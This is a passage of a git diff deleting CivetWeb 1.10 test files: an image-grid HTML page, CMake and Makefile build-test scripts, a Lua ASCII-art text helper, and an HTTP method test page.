-          <td><img src="imagetest/04.png"></td>
-          <td><img src="imagetest/05.png"></td>
-          <td><img src="imagetest/06.png"></td>
-          <td><img src="imagetest/07.png"></td>
-          <td><img src="imagetest/08.png"></td>
-          <td><img src="imagetest/09.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/10.png"></td>
-          <td><img src="imagetest/11.png"></td>
-          <td><img src="imagetest/12.png"></td>
-          <td><img src="imagetest/13.png"></td>
-          <td><img src="imagetest/14.png"></td>
-          <td><img src="imagetest/15.png"></td>
-          <td><img src="imagetest/16.png"></td>
-          <td><img src="imagetest/17.png"></td>
-          <td><img src="imagetest/18.png"></td>
-          <td><img src="imagetest/19.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/20.png"></td>
-          <td><img src="imagetest/21.png"></td>
-          <td><img src="imagetest/22.png"></td>
-          <td><img src="imagetest/23.png"></td>
-          <td><img src="imagetest/24.png"></td>
-          <td><img src="imagetest/25.png"></td>
-          <td><img src="imagetest/26.png"></td>
-          <td><img src="imagetest/27.png"></td>
-          <td><img src="imagetest/28.png"></td>
-          <td><img src="imagetest/29.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/30.png"></td>
-          <td><img src="imagetest/31.png"></td>
-          <td><img src="imagetest/32.png"></td>
-          <td><img src="imagetest/33.png"></td>
-          <td><img src="imagetest/34.png"></td>
-          <td><img src="imagetest/35.png"></td>
-          <td><img src="imagetest/36.png"></td>
-          <td><img src="imagetest/37.png"></td>
-          <td><img src="imagetest/38.png"></td>
-          <td><img src="imagetest/39.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/40.png"></td>
-          <td><img src="imagetest/41.png"></td>
-          <td><img src="imagetest/42.png"></td>
-          <td><img src="imagetest/43.png"></td>
-          <td><img src="imagetest/44.png"></td>
-          <td><img src="imagetest/45.png"></td>
-          <td><img src="imagetest/46.png"></td>
-          <td><img src="imagetest/47.png"></td>
-          <td><img src="imagetest/48.png"></td>
-          <td><img src="imagetest/49.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/50.png"></td>
-          <td><img src="imagetest/51.png"></td>
-          <td><img src="imagetest/52.png"></td>
-          <td><img src="imagetest/53.png"></td>
-          <td><img src="imagetest/54.png"></td>
-          <td><img src="imagetest/55.png"></td>
-          <td><img src="imagetest/56.png"></td>
-          <td><img src="imagetest/57.png"></td>
-          <td><img src="imagetest/58.png"></td>
-          <td><img src="imagetest/59.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/60.png"></td>
-          <td><img src="imagetest/61.png"></td>
-          <td><img src="imagetest/62.png"></td>
-          <td><img src="imagetest/63.png"></td>
-          <td><img src="imagetest/64.png"></td>
-          <td><img src="imagetest/65.png"></td>
-          <td><img src="imagetest/66.png"></td>
-          <td><img src="imagetest/67.png"></td>
-          <td><img src="imagetest/68.png"></td>
-          <td><img src="imagetest/69.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/70.png"></td>
-          <td><img src="imagetest/71.png"></td>
-          <td><img src="imagetest/72.png"></td>
-          <td><img src="imagetest/73.png"></td>
-          <td><img src="imagetest/74.png"></td>
-          <td><img src="imagetest/75.png"></td>
-          <td><img src="imagetest/76.png"></td>
-          <td><img src="imagetest/77.png"></td>
-          <td><img src="imagetest/78.png"></td>
-          <td><img src="imagetest/79.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/80.png"></td>
-          <td><img src="imagetest/81.png"></td>
-          <td><img src="imagetest/82.png"></td>
-          <td><img src="imagetest/83.png"></td>
-          <td><img src="imagetest/84.png"></td>
-          <td><img src="imagetest/85.png"></td>
-          <td><img src="imagetest/86.png"></td>
-          <td><img src="imagetest/87.png"></td>
-          <td><img src="imagetest/88.png"></td>
-          <td><img src="imagetest/89.png"></td>
-        </tr>
-        <tr>
-          <td><img src="imagetest/90.png"></td>
-          <td><img src="imagetest/91.png"></td>
-          <td><img src="imagetest/92.png"></td>
-          <td><img src="imagetest/93.png"></td>
-          <td><img src="imagetest/94.png"></td>
-          <td><img src="imagetest/95.png"></td>
-          <td><img src="imagetest/96.png"></td>
-          <td><img src="imagetest/97.png"></td>
-          <td><img src="imagetest/98.png"></td>
-          <td><img src="imagetest/99.png"></td>
-        </tr>
-      </table>
-    </p>
-    <p id="timing">
-      Test case: all images are displayed.
-    </p>
-    <p id="navigation">
-      <button onclick="window.history.back()">back</button>
-      <button onclick="location.reload()">reload</button>
-    </p>
-  </body>
-</html>
diff --git a/thirdparty/civetweb-1.10/test/CMakeLists.txt b/thirdparty/civetweb-1.10/test/CMakeLists.txt
deleted file mode 100644
index 964c4e3..0000000
--- a/thirdparty/civetweb-1.10/test/CMakeLists.txt
+++ /dev/null
@@ -1,246 +0,0 @@
-# Determine if we should print to the output
-if (CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT)
-  set(THIRD_PARTY_LOGGING 0)
-else()
-  set(THIRD_PARTY_LOGGING 1)
-endif()
-
-# We use the check unit testing framework for our C unit tests
-include(ExternalProject)
-#if(NOT WIN32)
-#  # Apply the patch to check to fix CMake building on OS X
-#  set(CHECK_PATCH_COMMAND patch
-#     ${CIVETWEB_THIRD_PARTY_DIR}/src/check-unit-test-framework/CMakeLists.txt
-#     ${CMAKE_SOURCE_DIR}/cmake/check/c82fe8888aacfe784476112edd3878256d2e30bc.patch
-#   )
-#else()
-#  set(CHECK_PATCH_COMMAND "")
-#endif()
-ExternalProject_Add(check-unit-test-framework
-  DEPENDS c-library
-
-## Use an official, released check version:
-#  URL "https://codeload.github.com/libcheck/check/zip/${CIVETWEB_CHECK_VERSION}"
-#  DOWNLOAD_NAME "${CIVETWEB_CHECK_VERSION}.zip"
-#  URL_MD5 ${CIVETWEB_CHECK_MD5_HASH}
-
-## Use a civetweb specific patched version
-URL "https://github.com/civetweb/check/archive/master.zip"
-DOWNLOAD_NAME "master.zip"
-# <Edit this file to flush AppVeyor build cache and force reloading check>
-
-  PREFIX "${CIVETWEB_THIRD_PARTY_DIR}"
-  BUILD_IN_SOURCE 1
-  PATCH_COMMAND ${CHECK_PATCH_COMMAND}
-  CMAKE_ARGS
-    "-DCMAKE_BUILD_TYPE=${CMAKE_BUILD_TYPE}"
-    "-DCMAKE_C_COMPILER=${CMAKE_C_COMPILER}"
-    "-DCMAKE_INSTALL_PREFIX=<INSTALL_DIR>"
-  LOG_DOWNLOAD ${THIRD_PARTY_LOGGING}
-  LOG_UPDATE ${THIRD_PARTY_LOGGING}
-  LOG_CONFIGURE ${THIRD_PARTY_LOGGING}
-  LOG_BUILD ${THIRD_PARTY_LOGGING}
-  LOG_TEST ${THIRD_PARTY_LOGGING}
-  LOG_INSTALL ${THIRD_PARTY_LOGGING})
-
-ExternalProject_Get_Property(check-unit-test-framework INSTALL_DIR)
-set(CHECK_INSTALL_DIR ${INSTALL_DIR})
-unset(INSTALL_DIR)
-link_directories("${CHECK_INSTALL_DIR}/lib")
-include_directories("${CHECK_INSTALL_DIR}/include")
-if ((WIN32 AND MINGW) OR APPLE)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/libcheck.a")
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/libcompat.a")
-elseif (WIN32)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/check.lib")
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};${CHECK_INSTALL_DIR}/lib/compat.lib")
-else()
-  set(CHECK_LIBRARIES "${CHECK_INSTALL_DIR}/lib/libcheck.a")
-endif()
-find_package(LibM)
-if (LIBM_FOUND)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};LIBM::LIBM")
-endif()
-find_package(LibRt)
-if (LIBRT_FOUND)
-  set(CHECK_LIBRARIES "${CHECK_LIBRARIES};LIBRT::LIBRT")
-endif()
-
-# Build the C unit tests
-add_library(shared-c-unit-tests STATIC shared.c)
-target_include_directories(
-  shared-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-
-add_library(public-func-c-unit-tests STATIC public_func.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(public-func-c-unit-tests PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  public-func-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(public-func-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(public-func-c-unit-tests check-unit-test-framework)
-
-add_library(public-server-c-unit-tests STATIC public_server.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(public-server-c-unit-tests PRIVATE CIVETWEB_DLL_IMPORTS)
-endif()
-target_include_directories(
-  public-server-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(public-server-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(public-server-c-unit-tests check-unit-test-framework)
-
-add_library(private-c-unit-tests STATIC private.c)
-target_include_directories(
-  private-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(private-c-unit-tests ${CHECK_LIBRARIES})
-add_dependencies(private-c-unit-tests check-unit-test-framework)
-
-add_library(timer-c-unit-tests STATIC timertest.c)
-target_include_directories(
-  timer-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(timer-c-unit-tests ${CHECK_LIBRARIES})
-add_dependencies(timer-c-unit-tests check-unit-test-framework)
-
-add_library(exe-c-unit-tests STATIC private_exe.c)
-if (BUILD_SHARED_LIBS)
-  target_compile_definitions(exe-c-unit-tests PRIVATE)
-endif()
-target_include_directories(
-  exe-c-unit-tests PUBLIC
-  ${PROJECT_SOURCE_DIR}/include)
-target_link_libraries(exe-c-unit-tests c-library ${CHECK_LIBRARIES})
-add_dependencies(exe-c-unit-tests check-unit-test-framework)
-
-add_executable(main-c-unit-test main.c)
-target_link_libraries(main-c-unit-test
-  shared-c-unit-tests
-  public-func-c-unit-tests
-  public-server-c-unit-tests
-  private-c-unit-tests
-  timer-c-unit-tests
-  exe-c-unit-tests
-  ${CHECK_LIBRARIES})
-add_dependencies(main-c-unit-test check-unit-test-framework)
-
-# Add a check command that builds the dependent test program
-add_custom_target(check-civetweb
-  COMMAND ${CMAKE_CTEST_COMMAND}
-  DEPENDS main-c-unit-test)
-
-# A macro for adding tests
-macro(civetweb_add_test suite test_case)
-  set(test "test-${suite}-${test_case}")
-  string(TOLOWER "${test}" test)
-  string(REGEX REPLACE "[^-A-Za-z0-9]" "-" test "${test}")
-  add_test(
-    NAME ${test}
-    COMMAND main-c-unit-test "--test-dir=${CMAKE_CURRENT_SOURCE_DIR}" "--suite=${suite}" "--test-case=${test_case}")
-  if (WIN32)
-    string(REPLACE ";" "\\;" test_path "$ENV{PATH}")
-    set_tests_properties(${test} PROPERTIES
-      ENVIRONMENT "PATH=${test_path}\\;$<TARGET_FILE_DIR:c-library>")
-  endif()
-endmacro(civetweb_add_test)
-
-
-# Tests of private functions
-civetweb_add_test(Private "HTTP Message")
-civetweb_add_test(Private "HTTP Keep Alive")
-civetweb_add_test(Private "URL Parsing 1")
-civetweb_add_test(Private "URL Parsing 2")
-civetweb_add_test(Private "URL Parsing 3")
-civetweb_add_test(Private "Internal Parsing 1")
-civetweb_add_test(Private "Internal Parsing 2")
-civetweb_add_test(Private "Internal Parsing 3")
-civetweb_add_test(Private "Internal Parsing 4")
-civetweb_add_test(Private "Internal Parsing 5")
-civetweb_add_test(Private "Internal Parsing 6")
-civetweb_add_test(Private "Encode Decode")
-civetweb_add_test(Private "Mask Data")
-civetweb_add_test(Private "Date Parsing")
-civetweb_add_test(Private "SHA1")
-
-# Public API function tests
-civetweb_add_test(PublicFunc "Version")
-civetweb_add_test(PublicFunc "Options")
-civetweb_add_test(PublicFunc "MIME types")
-civetweb_add_test(PublicFunc "strcasecmp")
-civetweb_add_test(PublicFunc "URL encoding decoding")
-civetweb_add_test(PublicFunc "Cookies and variables")
-civetweb_add_test(PublicFunc "MD5")
-civetweb_add_test(PublicFunc "Aux functions")
-
-# Public API server tests
-civetweb_add_test(PublicServer "Check test environment")
-civetweb_add_test(PublicServer "Init library")
-civetweb_add_test(PublicServer "Start threads")
-civetweb_add_test(PublicServer "Minimal Server")
-civetweb_add_test(PublicServer "Minimal Client")
-civetweb_add_test(PublicServer "Start Stop HTTP Server")
-civetweb_add_test(PublicServer "Start Stop HTTP Server IPv6")
-civetweb_add_test(PublicServer "Start Stop HTTPS Server")
-civetweb_add_test(PublicServer "TLS Server Client")
-civetweb_add_test(PublicServer "Server Requests")
-civetweb_add_test(PublicServer "Store Body")
-civetweb_add_test(PublicServer "Handle Form")
-civetweb_add_test(PublicServer "HTTP Authentication")
-civetweb_add_test(PublicServer "HTTP Keep Alive")
-civetweb_add_test(PublicServer "Error handling")
-civetweb_add_test(PublicServer "Limit speed")
-civetweb_add_test(PublicServer "Large file")
-civetweb_add_test(PublicServer "File in memory")
-
-# Timer tests
-civetweb_add_test(Timer "Timer Single Shot")
-civetweb_add_test(Timer "Timer Periodic")
-civetweb_add_test(Timer "Timer Mixed")
-
-# Tests with main.c
-#civetweb_add_test(EXE "Helper funcs")
-
-
-# Add the coverage command(s)
-if (${CMAKE_BUILD_TYPE} MATCHES "[Cc]overage")
-  find_program(GCOV_EXECUTABLE gcov)
-  find_program(LCOV_EXECUTABLE lcov)
-  find_program(GENHTML_EXECUTABLE genhtml)
-  find_program(CTEST_EXECUTABLE ctest)
-  if (GCOV_EXECUTABLE AND LCOV_EXECUTABLE AND GENHTML_EXECUTABLE AND CTEST_EXECUTABLE AND HAVE_C_FLAG_COVERAGE)
-    add_custom_command(
-      OUTPUT ${CMAKE_BINARY_DIR}/lcov/index.html
-      COMMAND ${LCOV_EXECUTABLE} -q -z -d .
-      COMMAND ${LCOV_EXECUTABLE} -q --no-external -c -b "${CMAKE_SOURCE_DIR}" -d . -o before.lcov -i
-      COMMAND ${CTEST_EXECUTABLE} --force-new-ctest-process
-      COMMAND ${LCOV_EXECUTABLE} -q --no-external -c -b "${CMAKE_SOURCE_DIR}" -d . -o after.lcov
-      COMMAND ${LCOV_EXECUTABLE} -q -a before.lcov -a after.lcov --output-file final.lcov
-      COMMAND ${LCOV_EXECUTABLE} -q -r final.lcov "'${CMAKE_SOURCE_DIR}/test/*'" -o final.lcov
-      COMMAND ${GENHTML_EXECUTABLE} final.lcov -o lcov --demangle-cpp --sort -p "${CMAKE_SOURCE_DIR}" -t benchmark
-      DEPENDS main-c-unit-test
-      WORKING_DIRECTORY ${CMAKE_BINARY_DIR}
-      COMMENT "Running LCOV"
-    )
-    add_custom_target(coverage
-      DEPENDS ${CMAKE_BINARY_DIR}/lcov/index.html
-      COMMENT "LCOV report at lcov/index.html"
-    )
-    message(STATUS "Coverage command added")
-  else()
-    if (HAVE_C_FLAG_COVERAGE)
-      set(C_FLAG_COVERAGE_MESSAGE supported)
-    else()
-      set(C_FLAG_COVERAGE_MESSAGE unavailable)
-    endif()
-    message(WARNING
-      "Coverage command not available:\n"
-      "  gcov: ${GCOV_EXECUTABLE}\n"
-      "  lcov: ${LCOV_EXECUTABLE}\n"
-      "  genhtml: ${GENHTML_EXECUTABLE}\n"
-      "  ctest: ${CTEST_EXECUTABLE}\n"
-      "  --coverage flag: ${C_FLAG_COVERAGE_MESSAGE}")
-  endif()
-endif()
diff --git a/thirdparty/civetweb-1.10/test/HugeText.lua b/thirdparty/civetweb-1.10/test/HugeText.lua
deleted file mode 100644
index 0fa57f1..0000000
--- a/thirdparty/civetweb-1.10/test/HugeText.lua
+++ /dev/null
@@ -1,149 +0,0 @@
--- (c) bel2125, 2010

--- MIT public licence

-

-

-local letterCode = {

-  [' '] = {0,0,0,0,0},

-  ['!'] = {0,0,95,0,0},

-  ['"'] = {0,3,4,3,0},

-  ['#'] = {34,127,34,127,34},

-  ['$'] = {36,42,127,42,18},

-  ['%'] = {35,19,8,100,98},

-  ['&'] = {54,73,85,34,80},

-  ["'"] = {0,11,7,0,0},

-  ['('] = {0,28,34,65,0},

-  [')'] = {0,65,34,28,0},

-  ['*'] = {20,8,62,8,20},

-  ['+'] = {8,8,62,8,8},

-  [','] = {0,88,56,0,0},

-  ['-'] = {8,8,8,8,8},

-  ['.'] = {0,96,96,0,0},

-  ['/'] = {32,16,8,4,2},

-  ['0'] = {62,81,73,69,62},

-  ['1'] = {0,66,127,64,0},

-  ['2'] = {66,97,81,73,70},

-  ['3'] = {65,73,77,75,49},

-  ['4'] = {24,20,18,127,16},

-  ['5'] = {39,69,69,69,57},

-  ['6'] = {60,74,73,73,48},

-  ['7'] = {1,1,121,5,3},

-  ['8'] = {54,73,73,73,54},

-  ['9'] = {6,73,73,41,30},

-  [':'] = {0,54,54,0,0},

-  [';'] = {0,91,59,0,0},

-  ['<'] = {8,20,34,65,0},

-  ['='] = {20,20,20,20,20},

-  ['>'] = {0,65,34,20,8},

-  ['?'] = {2,1,81,9,6},

-  ['@'] = {50,73,121,65,62},

-  ['A'] = {124,18,17,18,124},

-  ['B'] = {65,127,73,73,54},

-  ['C'] = {62,65,65,65,34},

-  ['D'] = {65,127,65,65,62},

-  ['E'] = {127,73,73,73,65},

-  ['F'] = {127,9,9,9,1},

-  ['G'] = {62,65,65,73,57},

-  ['H'] = {127,8,8,8,127},

-  ['I'] = {0,65,127,65,0},

-  ['J'] = {32,64,65,63,1},

-  ['K'] = {127,8,20,34,65},

-  ['L'] = {127,64,64,64,64},

-  ['M'] = {127,2,12,2,127},

-  ['N'] = {127,4,8,16,127},

-  ['O'] = {62,65,65,65,62},

-  ['P'] = {127,9,9,9,6},

-  ['Q'] = {62,65,81,33,94},

-  ['R'] = {127,9,25,41,70},

-  ['S'] = {38,73,73,73,50},

-  ['T'] = {1,1,127,1,1},

-  ['U'] = {63,64,64,64,63},

-  ['V'] = {7,24,96,24,7},

-  ['W'] = {127,32,24,32,127},

-  ['X'] = {99,20,8,20,99},

-  ['Y'] = {3,4,120,4,3},

-  ['Z'] = {97,81,73,69,67},

-  ['['] = {0,127,65,65,0},

-  ['\\'] = {2,4,8,16,32},

-  [']'] = {0,65,65,127,0},

-  ['^'] = {24,4,2,4,24},

-  ['_'] = {64,64,64,64,64},

-  ['`'] = {0,0,7,11,0},

-  ['a'] = {56,68,68,60,64},

-  ['b'] = {127,72,68,68,56},

-  ['c'] = {56,68,68,68,32},

-  ['d'] = {56,68,68,72,127},

-  ['e'] = {56,84,84,84,24},

-  ['f'] = {0,8,126,9,2},

-  ['g'] = {8,84,84,60,0},

-  ['h'] = {127,4,4,120,0},

-  ['i'] = {0,0,125,0,0},

-  ['j'] = {32,64,68,61,0},

-  ['k'] = {127,16,40,68,0},

-  ['l'] = {0,0,127,0,0},

-  ['m'] = {120,4,120,4,120},

-  ['n'] = {124,8,4,4,120},

-  ['o'] = {56,68,68,68,56},

-  ['p'] = {124,20,20,20,8},

-  ['q'] = {24,36,20,124,64},

-  ['r'] = {124,8,4,4,0},

-  ['s'] = {72,84,84,84,32},

-  ['t'] = {4,62,68,32,0},

-  ['u'] = {60,64,64,32,124},

-  ['v'] = {28,32,64,32,28},

-  ['w'] = {60,64,48,64,60},

-  ['x'] = {68,36,124,72,68},

-  ['y'] = {12,80,80,60,0},

-  ['z'] = {68,100,84,76,68},

-  ['{'] = {0,8,54,65,0},

-  ['|'] = {0,0,119,0,0},

-  ['}'] = {0,65,54,8,0},

-  ['~'] = {8,4,8,16,8},

-};

-

-letterCode['('] = {0,60,66,129,0}

-letterCode[')'] = {0,129,66,60,0}

-letterCode[','] = {0,176,112,0,0}

-letterCode[';'] = {0,182,118,0,0}

-letterCode['['] = {0,255,129,129,0}

-letterCode[']'] = {0,129,129,255,0}

-letterCode['_'] = {128,128,128,128,128}

-letterCode['g'] = {24,164,164,124,0}

-letterCode['j'] = {64,128,132,125,0}

-letterCode['p'] = {252,36,36,36,24}

-letterCode['q'] = {24,36,36,252,128}

-letterCode['y'] = {12,80,80,60,0}

-letterCode['{'] = {0,24,102,129,0}

-letterCode['}'] = {0,129,102,24,0}

-

-

-local function HugeLetter(letter)

-  if letter==' ' then return {"  ", "  ", "  ", "  ", "  ", "  ", "  ", "  "} end

-  local code = letterCode[letter]  

-  local str = {"", "", "", "", "", "", "", ""}

-  for i=1,5 do

-    local n = code[i]

-    if n and n>0 then

-      for b=1,8 do

-        if bit32.btest(n, bit32.lshift(1, b-1)) then str[b] = str[b] .. letter else str[b] = str[b] .. ' ' end

-      end

-    end

-  end

-  return str

-end

-

-function HugeText(str)

-  local txt = {"", "", "", "", "", "", "", ""}

-  for i=1,string.len(str) do

-    local s = HugeLetter(str:sub(i,i))

-    for b=1,8 do

-      if i>1 then

-        txt[b] = txt[b] .. "   " .. s[b]

-      else

-        txt[b] = txt[b] .. s[b]

-      end

-    end

-  end

-  return txt

-end

-

-return HugeText

diff --git a/thirdparty/civetweb-1.10/test/MakefileTest.mk b/thirdparty/civetweb-1.10/test/MakefileTest.mk
deleted file mode 100644
index 08d8e33..0000000
--- a/thirdparty/civetweb-1.10/test/MakefileTest.mk
+++ /dev/null
@@ -1,88 +0,0 @@
-# 
-# Copyright (c) 2013 No Face Press, LLC
-# License http://opensource.org/licenses/mit-license.php MIT License
-#
-
-#This makefile is used to test the other Makefiles
-
-TOP = ..
-TEST_OUT = test_install
-
-include $(TOP)/resources/Makefile.in-os
-
-all: test
-
-test: buildoptions buildlibs buildinstall
-test: buildexamples threaded
-
-ifeq ($(TARGET_OS),OSX)
-test: dmg
-endif
-
-test: clean
-	@echo PASSED
-
-dmg:
-	@echo "================"
-	$(MAKE) -C $(TOP) -f Makefile.osx clean package
-
-buildexamples:
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/embedded_c clean all
-	$(MAKE) -C $(TOP)/examples/embedded_c clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/embedded_cpp clean all
-	$(MAKE) -C $(TOP)/examples/embedded_cpp clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/chat clean all
-	$(MAKE) -C $(TOP)/examples/chat clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/hello clean all
-	$(MAKE) -C $(TOP)/examples/hello clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/post clean all
-	$(MAKE) -C $(TOP)/examples/post clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/upload clean all
-	$(MAKE) -C $(TOP)/examples/upload clean
-	@echo "================"
-	$(MAKE) -C $(TOP)/examples/websocket clean all
-	$(MAKE) -C $(TOP)/examples/websocket clean
-
-buildoptions:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_IPV6=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_WEBSOCKET=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_LUA=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean build WITH_LUA=1 WITH_IPV6=1 WITH_WEBSOCKET=1
-
-threaded:
-	@echo "================"
-	$(MAKE) -j 8 -C $(TOP) clean WITH_LUA=1
-	$(MAKE) -j 8 -C $(TOP) build WITH_LUA=1
-
-buildinstall:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean install PREFIX=$(TEST_OUT)
-
-buildlibs:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean lib
-	@echo "================"
-	$(MAKE) -C $(TOP) clean slib
-	@echo "================"
-	$(MAKE) -C $(TOP) clean lib WITH_CPP=1
-	@echo "================"
-	$(MAKE) -C $(TOP) clean slib WITH_CPP=1
-
-clean:
-	@echo "================"
-	$(MAKE) -C $(TOP) clean
-	rm -rf $(TOP)/$(TEST_OUT)
-
-.PHONY: all buildoptions buildinstall clean os linux
diff --git a/thirdparty/civetweb-1.10/test/MethodTest.xhtml b/thirdparty/civetweb-1.10/test/MethodTest.xhtml
deleted file mode 100644
index b9365e2..0000000
--- a/thirdparty/civetweb-1.10/test/MethodTest.xhtml
+++ /dev/null
@@ -1,200 +0,0 @@
-<!DOCTYPE HTML>

-<html xmlns="http://www.w3.org/1999/xhtml">

-<head>

-<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

-  <title>HTTP method test</title>

-  <style type="text/css" media="screen">

-    body {background:#eee; margin:0%; padding:0%; padding-top:0%; padding-left:1%}

-    .cform {margin:0%; padding:0%; padding-top:0%; padding-left:2%;}

-    h3 {margin:0%; padding:0%; padding-top:0%; padding-left:0%;}

-    td {vertical-align:top; text-align:left;}

-  </style>

-  <script type="text/javascript"><![CDATA[

-

-    function getParams() {

-      var result = {};

-      var kvPairs = location.search.slice(1).split('&');

-

-      kvPairs.forEach(

-        function(kvPair) {

-          kvPair = kvPair.split('=');

-          result[kvPair[0]] = kvPair[1] || '';

-        }

-      );

-

-      return result;

-    }

-

-    function noBody() {

-      document.getElementById("body_none").checked = true;

-    }

-

-    function load() {

-      var params = getParams();

-      var method = params["method"];

-      if (!method) {

-        method = "GET";

-      }

-      var path = params["path"];

-      if (!path) {

-        path = "";

-      }

-

-      var elem = document.getElementById('h1');

-      elem.innerHTML = "HTTP method test page";

-

-      document.getElementById("proto_http").checked = (window.location.protocol != "https:");

-      document.getElementById("proto_https").checked = (window.location.protocol == "https:");

-      document.getElementById("server").value = location.host;

-      document.getElementById("resource").value = path;

-

-      setRadioValue("method", method);

-      noBody();

-    }

-

-    function setRadioValue(elmname, value) {

-      var elms = document.getElementsByName(elmname);

-      var len = elms.length;

-      var ret = false;

-

-      for (var i=0; i<len; i++) {

-        elms[i].checked = (elms[i].value == value);

-        ret |= elms[i].checked;

-      }

-      return ret;

-    }

-

-    function getRadioValue(elmname) {

-

-      var elms = document.getElementsByName(elmname);

-      var len = elms.length;

-      var ret = "";

-

-      for (var i=0; i<len; i++) {

-        if (elms[i].checked) {

-          ret = elms[i].value;

-        }

-      }

-      return ret;

-    }

-

-    function sendreq() {

-      var proto = getRadioValue("protocol");

-      var host = document.getElementById("server").value;

-      var res = document.getElementById("resource").value;

-      var addr = proto + "://" + host + "/" + res;

-      var meth = getRadioValue("method");

-      var body = getRadioValue("body");

-

-      xmlhttp = new XMLHttpRequest();

-      if (!xmlhttp) {

-        alert("XMLHttpRequest not available");

-        window.history.back();

-      }

-

-      xmlhttp.open(meth,addr,true);

-

-      if (body == '*') {

-        body = null;

-      } else {

-        if (body == '**') {

-          var body_bytes = document.getElementById("body_bytes").value;

-          body_bytes = parseInt(Number(body_bytes) || 0) || 0;

-          body = "";

-          for (var i=0; i<body_bytes; i++) {

-            var ascii = Math.floor((Math.random() * 94) + 32);

-            body = body + String.fromCharCode(ascii);

-          }

-        }

-        xmlhttp.setRequestHeader("Content-Length", body.length);

-      }

-

-      xmlhttp.onreadystatechange = function()

-      {

-          var laddr = addr;

-          var lmeth = meth;

-          var blen = "";

-          if (body) {

-            blen = "\nWith " + body.length + " bytes body data";

-          }

-

-          if (xmlhttp.readyState == 4)

-          {

-              alert(lmeth + " " + laddr + blen + "\n\nResponse: " + xmlhttp.status + "\n\n" + xmlhttp.responseText);

-          }

-      }

-

-      xmlhttp.send(body);

-

-    }

-

-  ]]></script>

-

-</head>

-<body onload="load()">

-

-<h1 id='h1'>Fatal error: Javascript not available!</h1>

-

-<h2>Test parameters</h2>

-<form lass="cform">

-

-<h3>Protocol</h3>

-<input id="proto_http" type="radio" name="protocol" value="http" /> http <br />

-<input id="proto_https" type="radio" name="protocol" value="https" /> https

-

-<h3>Server/Host</h3>

-<input id="server" type="text" name="server" value="" />

-

-<h3>Resource</h3>

-<input id="resource" type="text" name="resource" value="" />

-

-<h3>Method</h3>

-<!-- http://www.restpatterns.org/HTTP_Methods -->

-<!-- http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html -->

-<table style="border-spacing:15px 0px;">

-  <tr>

-    <td><a href="http://tools.ietf.org/html/rfc7231#section-4.2.1">Save Methods</a></td>

-    <td>"Unsave" <a href="http://tools.ietf.org/html/rfc7231#section-4.2.2">Idempotent Methods</a></td>

-    <td>Non-Idempotent Methods</td>

-    <td>Special</td>

-  </tr>

-  <tr>

-    <td>

-<input id="method_opt" type="radio" name="method" value="OPTIONS" onclick="noBody()" /> OPTIONS <br />

-<input id="method_get" type="radio" name="method" value="GET" onclick="noBody()" /> GET <br />

-<input id="method_hea" type="radio" name="method" value="HEAD" onclick="noBody()" /> HEAD <br />

-<input id="method_tra" type="radio" name="method" value="TRACE" /> TRACE <br />

-<input id="method_pro" type="radio" name="method" value="PROPFIND" /> PROPFIND <br />

-    </td>

-    <td>

-<input id="method_put" type="radio" name="method" value="PUT" /> PUT <br />

-<input id="method_del" type="radio" name="method" value="DELETE" /> DELETE <br />

-<input id="method_cop" type="radio" name="method" value="COPY" /> COPY <br />

-<input id="method_cop" type="radio" name="method" value="MOVE" /> MOVE <br />

-<input id="method_ppa" type="radio" name="method" value="PROPPATCH" /> PROPPATCH <br />

-<input id="method_unl" type="radio" name="method" value="UNLOCK" /> UNLOCK <br />

-    </td>

-    <td>

-<input id="method_pos" type="radio" name="method" value="POST" /> POST <br />

-<input id="method_pat" type="radio" name="method" value="PATCH" /> PATCH <br />

-<input id="method_mkc" type="radio" name="method" value="MKCOL" /> MKCOL <br />

-<input id="method_loc" type="radio" name="method" value="LOCK" /> LOCK <br />

-    </td>

-    <td>

-<input id="method_con" type="radio" name="method" value="CONNECT" /> CONNECT <br />

-<input id="method_userdef" type="radio" name="method" value="INVALID" /> <input id="method_name" type="text" name="method_name" value="INVALID" oninput="var elem = document.getElementById('method_userdef'); elem.checked = true; elem.value=value" /> <br />

-    </td>

-  </tr>

-</table>

-

